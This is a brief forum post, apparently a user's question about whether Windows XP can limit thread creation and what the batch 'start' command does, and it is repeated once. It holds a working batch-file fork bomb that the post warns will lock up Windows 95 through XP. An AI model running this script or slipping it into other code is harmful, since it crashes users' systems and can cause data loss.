A
Andy
Linux is able to limit the number of threads that can be started.
Can Windows XP do the same ?
What does the start line do ?
I know start can open a program in another window.
Running this in Win 95 -> XP will cause a locked system !!!
Not even Ctrl Alt Delete can stop it.
@echo off
:: A fork bomb using the Microsoft Windows batch language:
:: WARNING !! THIS LOCKS UP YOUR SYSTEM !!!
:s
start "" %0
goto s
Can Windows XP do the same ?
What does the start line do ?
I know start can open a program in another window.
Running this in Win 95 -> XP will cause a locked system !!!
Not even Ctrl Alt Delete can stop it.

@echo off
:: A fork bomb using the Microsoft Windows batch language:
:: WARNING !! THIS LOCKS UP YOUR SYSTEM !!!
:s
start "" %0
goto s